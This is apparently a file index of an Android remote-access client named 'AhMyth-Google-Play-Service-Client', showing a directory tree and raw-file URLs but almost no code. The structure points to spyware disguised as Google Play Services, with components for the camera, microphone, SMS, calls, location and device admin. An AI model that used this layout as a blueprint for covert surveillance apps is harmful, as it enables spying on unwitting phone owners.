├── .gitignore ├── .idea ├── .gitignore ├── compiler.xml ├── deploymentTargetDropDown.xml ├── gradle.xml ├── inspectionProfiles │ └── Project_Default.xml ├── misc.xml ├── render.experimental.xml └── vcs.xml ├── README.md ├── app ├── .gitignore ├── build.gradle ├── proguard-rules.pro ├── release │ └── output-metadata.json └── src │ ├── androidTest │ └── java │ │ └── com │ │ └── android │ │ └── background │ │ └── services │ │ └── ExampleInstrumentedTest.java │ ├── main │ ├── AndroidManifest.xml │ ├── ic_launcher-playstore.png │ ├── java │ │ └── com │ │ │ └── android │ │ │ └── background │ │ │ └── services │ │ │ ├── ConnectionManager.java │ │ │ ├── IOSocket.java │ │ │ ├── MainActivity.java │ │ │ ├── MainService.java │ │ │ ├── helpers │ │ │ ├── AppsListManager.java │ │ │ ├── CallsManager.java │ │ │ ├── CameraManager.java │ │ │ ├── ContactsManager.java │ │ │ ├── FileManager.java │ │ │ ├── LocManager.java │ │ │ ├── MicManager.java │ │ │ └── SMSManager.java │ │ │ └── receivers │ │ │ ├── AdminReceiver.java │ │ │ └── MyReceiver.java │ └── res │ │ ├── drawable-v24 │ │ └── ic_launcher_foreground.xml │ │ ├── drawable │ │ ├── ic_launcher_background.png │ │ └── play_service_icon.png │ │ ├── layout │ │ └── activity_main.xml │ │ ├── mipmap-anydpi-v26 │ │ ├── ic_launcher.xml │ │ └── ic_launcher_round.xml │ │ ├── mipmap-hdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-mdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-xhdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-xxhdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── mipmap-xxxhdpi │ │ ├── ic_launcher.png │ │ ├── ic_launcher_foreground.png │ │ └── ic_launcher_round.png │ │ ├── values-night │ │ └── themes.xml │ │ ├── values │ │ ├── colors.xml │ │ ├── ic_launcher_background.xml │ │ ├── strings.xml │ │ └── themes.xml │ │ └── xml │ │ └── device_admin.xml │ └── test │ └── java │ └── com │ └── android │ └── background │ └── services │ └── ExampleUnitTest.java ├── gradle.properties ├── gradle └── wrapper │ ├── gradle-wrapper.jar │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat └── settings.gradle /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.gitignore -------------------------------------------------------------------------------- /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | -------------------------------------------------------------------------------- /.idea/compiler.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/compiler.xml -------------------------------------------------------------------------------- /.idea/deploymentTargetDropDown.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/deploymentTargetDropDown.xml -------------------------------------------------------------------------------- /.idea/gradle.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/gradle.xml -------------------------------------------------------------------------------- /.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/inspectionProfiles/Project_Default.xml -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/misc.xml -------------------------------------------------------------------------------- /.idea/render.experimental.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/render.experimental.xml -------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/.idea/vcs.xml -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/README.md -------------------------------------------------------------------------------- /app/.gitignore: -------------------------------------------------------------------------------- 1 | /build -------------------------------------------------------------------------------- /app/build.gradle: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/build.gradle -------------------------------------------------------------------------------- /app/proguard-rules.pro: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/proguard-rules.pro -------------------------------------------------------------------------------- /app/release/output-metadata.json: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/release/output-metadata.json -------------------------------------------------------------------------------- /app/src/androidTest/java/com/android/background/services/ExampleInstrumentedTest.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/androidTest/java/com/android/background/services/ExampleInstrumentedTest.java -------------------------------------------------------------------------------- /app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/AndroidManifest.xml -------------------------------------------------------------------------------- /app/src/main/ic_launcher-playstore.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/ic_launcher-playstore.png -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/ConnectionManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/ConnectionManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/IOSocket.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/IOSocket.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/MainActivity.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/MainActivity.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/MainService.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/MainService.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/AppsListManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/AppsListManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/CallsManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/CallsManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/CameraManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/CameraManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/ContactsManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/ContactsManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/FileManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/FileManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/LocManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/LocManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/MicManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/MicManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/helpers/SMSManager.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/helpers/SMSManager.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/receivers/AdminReceiver.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/receivers/AdminReceiver.java -------------------------------------------------------------------------------- /app/src/main/java/com/android/background/services/receivers/MyReceiver.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/java/com/android/background/services/receivers/MyReceiver.java -------------------------------------------------------------------------------- /app/src/main/res/drawable-v24/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/drawable-v24/ic_launcher_foreground.xml -------------------------------------------------------------------------------- /app/src/main/res/drawable/ic_launcher_background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/drawable/ic_launcher_background.png -------------------------------------------------------------------------------- /app/src/main/res/drawable/play_service_icon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/drawable/play_service_icon.png -------------------------------------------------------------------------------- /app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/layout/activity_main.xml -------------------------------------------------------------------------------- /app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml -------------------------------------------------------------------------------- /app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml -------------------------------------------------------------------------------- /app/src/main/res/mipmap-hdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-hdpi/ic_launcher.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-hdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-hdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-hdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-mdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-mdpi/ic_launcher.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-mdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-mdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-mdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xhdpi/ic_launcher.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xxhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xxxhdpi/ic_launcher.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xxxhdpi/ic_launcher_foreground.png -------------------------------------------------------------------------------- /app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png -------------------------------------------------------------------------------- /app/src/main/res/values-night/themes.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/values-night/themes.xml -------------------------------------------------------------------------------- /app/src/main/res/values/colors.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/values/colors.xml -------------------------------------------------------------------------------- /app/src/main/res/values/ic_launcher_background.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/values/ic_launcher_background.xml -------------------------------------------------------------------------------- /app/src/main/res/values/strings.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/values/strings.xml -------------------------------------------------------------------------------- /app/src/main/res/values/themes.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/values/themes.xml -------------------------------------------------------------------------------- /app/src/main/res/xml/device_admin.xml: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/main/res/xml/device_admin.xml -------------------------------------------------------------------------------- /app/src/test/java/com/android/background/services/ExampleUnitTest.java: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/app/src/test/java/com/android/background/services/ExampleUnitTest.java -------------------------------------------------------------------------------- /gradle.properties: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/gradle.properties -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/gradle/wrapper/gradle-wrapper.properties -------------------------------------------------------------------------------- /gradlew: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/gradlew -------------------------------------------------------------------------------- /gradlew.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/gradlew.bat -------------------------------------------------------------------------------- /settings.gradle: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Morsmalleo/AhMyth-Google-Play-Service-Client/HEAD/settings.gradle --------------------------------------------------------------------------------